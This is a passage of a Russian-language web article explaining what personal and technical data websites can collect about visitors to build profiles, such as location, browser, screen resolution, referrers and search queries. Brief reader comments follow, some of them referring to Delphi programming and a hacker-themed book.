мире любопытных? А вот если, скажем, отправляться будет не вся память, а только некоторые данные? Например, список адресатов электронной почты, служебной и личной — отдельно? Или перечень серверов и страниц Интернет, к которым с этого компьютера обращаются чаще всего? Или время, когда компьютер включают и выключают?
По мере удешевления средств хранения и обработки данных начинают распространяться системы изощренного сбора и анализа таких сведений, на которые раньше никто не обращал внимание. Что, если в общественной электронной библиотеке, имеющей подробные матрериалы по практически любой тематике, в течение длительного времени вести учет с точностью до малейших деталей, фиксируя кто именно и что именно читал, на каких абзацах задерживался, а что пропускал? Обрабатывая и сопоставляя эти данные с другими (например, с регистрационными: возраст, профессия, пол и др.) можно получить сведения, имеющие огромную ценность для тех, кто знает как их применить. А ведь Интернет — это именно такая библиотека...
К тому, что статистика знает все, мы уже как-то успели попривыкнуть. Но появившаяся в последнее время возможность целенаправленного сбора именно личной информации о пользователях Сети с целью ее последующей продажи или непосредственного использования собирающими вызывает определенное беспокойство. Причем характер этой информации может значительно отличаться от того, что мы привыкли считать сведениями, которые следует скрывать от посторонних, как-то: пароли, номера банковских счетов и кредитных карт, расписание работы и прочие „ключи от квартиры, где деньги лежат“.
Речь идет об интенсивном сборе достаточно безобидных с виду сведений: уровень Ваших доходов (хотя в развитых странах этот вопрос считается неприличным), общественное, семейное и служебное положение, состав семьи, характер расходов, планы по приобретению тех или иных товаров и услуг, Ваши вкусы и предпочтения, и прочее. Все эти вопросы издавна задают службы исследования рынка и повышения эффективности отделов продаж. До недавних пор это была просто статистика, помогающая развивать производство и формировать рынок согласно пожеланиям большинства покупателей. Но с появлением возможности оказания услуг и проведения анкетирования через Интернет ситуация изменилась. Теперь любой содержатель сервера, привлекательного для широкой аудитории, может за разумное время и реальные деньги составить на каждого из посетителей досье, которому может позавидовать иная спецслужба.
Что именно они знают?
Итак, что можно узнать о Вас, не задав ни одного вопроса и не устанавливая на Ваш компьютер свои программы (эта возможность, естественно, даст еще больший эффект)?
Местонахождение (страна, фирма, Интернет-кафе, провайдер Интернет и пр.) Тип Вашего компьютера Разрешение экрана, с которого Вы смотрите на их страницу Местное время (по часам Вашего компьютера) Операционную систему, в которой Вы сейчас работаете Тип и версию программы, из которой Вы обратились к серверу Работаете ли с того же самого (физического) компьютера, что и в прошлый раз Наличие цифрового удостоверения (сертификата) и из него — регистрационные данные, с которыми Вы его получили. Шифруется ли информация по пути между Вами и сервером, и если да то каким именно способом, и от кого Вы получили ключ (при наличии сертификата) Какие именно страницы или файлы Вы получили (или регулярно забираете) с их сервера По каким ссылкам (в первую очередь, рекламным баннерам) с их страниц „ходите“, а какие всегда оставляете без внимания Какую страницу смотрели до того, как попали к ним, и куда пошли после этого Какие вопросы задаете их поисковой системе На какие бюллетени (списки почтовой рассылки) подписаны Какие группы новостей (USENET) читаете, в какие и что пишете
Н?
Нравится
Не нравится

8 комментариев

17:33
Пи$Дато! мне понравилось
00:58
хорошая статья
20:30
Кууууууууууууууул!
Правильно, полностью поддерживаю!
23:22
на какой делфи писал то ? ато у меня 7 .
17:02
Требую описания типа RegIniFile!
18:42
Статья супер, то что надо!!!!!!!!!!!
Респект ualiyo!
14:15
Инфа слизана из книги Михаил Фленов "Программирование в Delphi глазами хакера"
18:49
"Программирование на Делфи глазами хакера" - рульная книженция! А если нет возможности купить, то можно хоть что-нить подчерпнуть отсюдово.